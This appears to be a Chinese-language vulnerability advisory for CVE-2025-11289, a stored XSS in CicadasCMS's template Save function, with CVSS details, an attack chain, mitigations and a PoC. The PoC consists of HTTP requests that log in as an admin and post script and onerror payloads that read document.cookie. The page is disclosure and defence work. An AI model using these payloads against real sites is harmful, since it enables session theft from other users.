CVE-2025-11289 CicadasCMS模板管理页面存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11289

漏洞类型

跨站脚本攻击（XSS）

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

westboy CicadasCMS

漏洞概述

CVE-2025-11289是westboy CicadasCMS内容管理系统中的一个跨站脚本（XSS）漏洞。该漏洞影响CicadasCMS至提交版本2431154dac8d0735e04f1fd2a3c3556668fc8dab。受影响的组件为模板管理页面（Template Management Page），具体涉及文件src/main/java/com/zhiliao/common/template/TemplateFileServiceImpl.java中的Save函数。该漏洞允许攻击者通过远程方式实施跨站脚本攻击，利用恶意脚本代码注入到模板管理功能中。攻击者可以利用此漏洞窃取用户会话信息、篡改页面内容或执行其他恶意操作。该漏洞已公开披露，可能已被恶意攻击者利用。根据CVSS 3.1评分标准，该漏洞评分为2.4分，属于低危级别。攻击需要高权限认证和用户交互才能完成，攻击向量为网络，对机密性和完整性有低影响，对可用性无影响。该漏洞由[email protected]发现并报告，披露日期为2025年10月5日。

技术细节

该漏洞位于CicadasCMS的模板管理功能中，具体存在于TemplateFileServiceImpl.java文件的Save函数中。漏洞的根本原因是模板文件保存功能未对用户输入进行充分的过滤和转义处理，导致攻击者可以将恶意JavaScript代码注入到模板文件中。当其他用户访问包含恶意代码的模板页面时，浏览器会执行嵌入的恶意脚本，从而实现跨站脚本攻击。攻击者需要具备高权限（如管理员权限）才能访问模板管理功能并执行保存操作，因此该漏洞的利用门槛相对较高。攻击向量为网络（AV:N），攻击复杂度低（AC:L），但需要高权限（PR:H）和用户交互（UI:R）。一旦成功利用，攻击者可以窃取用户的会话cookie、进行钓鱼攻击、篡改页面内容或执行其他客户端恶意操作。该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N，表明攻击范围未改变，对机密性影响低，对完整性影响低，对可用性无影响。

攻击链分析

STEP 1

步骤1

攻击者获取具有模板管理权限的账户凭证（需要高权限认证）

STEP 2

步骤2

攻击者登录CicadasCMS管理后台，导航至模板管理页面

STEP 3

步骤3

攻击者在模板的Save功能中注入恶意JavaScript代码或HTML payload

STEP 4

步骤4

恶意代码随模板文件保存到服务器，未经过滤处理

STEP 5

步骤5

当其他用户（尤其是管理员）访问包含恶意模板的页面时，浏览器执行注入的脚本

STEP 6

步骤6

攻击者通过恶意脚本窃取用户会话cookie、进行钓鱼攻击或执行其他客户端恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- PoC for CVE-2025-11289: CicadasCMS Template Management XSS -->
<!-- Attack vector: Stored XSS via Template Save function -->
<!-- Target: src/main/java/com/zhiliao/common/template/TemplateFileServiceImpl.java -->

// Step 1: Login as admin user (requires high privileges)
POST /admin/login HTTP/1.1
Host: target-cicadas-cms.com
Content-Type: application/x-www-form-urlencoded

username=admin&password=admin_password

// Step 2: Navigate to Template Management page
GET /admin/template/list HTTP/1.1
Host: target-cicadas-cms.com

// Step 3: Inject malicious XSS payload via the Save function
POST /admin/template/save HTTP/1.1
Host: target-cicadas-cms.com
Content-Type: application/x-www-form-urlencoded

templateName=<script>alert(document.cookie)</script>&templateContent=<img src=x onerror=alert(1)>

// Step 4: When another user (especially admin) views the template page,
// the malicious script executes in their browser context
// This can be used to steal cookies, perform actions on behalf of the user,
// or redirect to malicious sites

影响范围

westboy CicadasCMS <= 2431154dac8d0735e04f1fd2a3c3556668fc8dab

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）对模板管理功能实施严格的访问控制，限制可访问该功能的用户范围；2）在Web服务器或反向代理层面部署WAF规则，检测和阻止包含恶意脚本的请求；3）对模板内容进行人工审核，确保不包含可疑的JavaScript代码；4）启用Content-Security-Policy头，限制内联脚本执行；5）定期检查已保存的模板文件，及时清理可疑内容。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-11289
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-11289
3 Details https://www.cvedetails.com/cve/CVE-2025-11289/
4 VulDB https://vuldb.com/cve/CVE-2025-11289
5 Link https://github.com/devastatingglamour/CVE/blob/main/CicadasCMS-XSS4.md
6 Link https://vuldb.com/?ctiid.327170
7 Link https://vuldb.com/?id.327170
8 Link https://vuldb.com/?submit.659789
9 Link https://vuldb.com/?submit.709804
10 Link https://github.com/devastatingglamour/CVE/blob/main/CicadasCMS-XSS4.md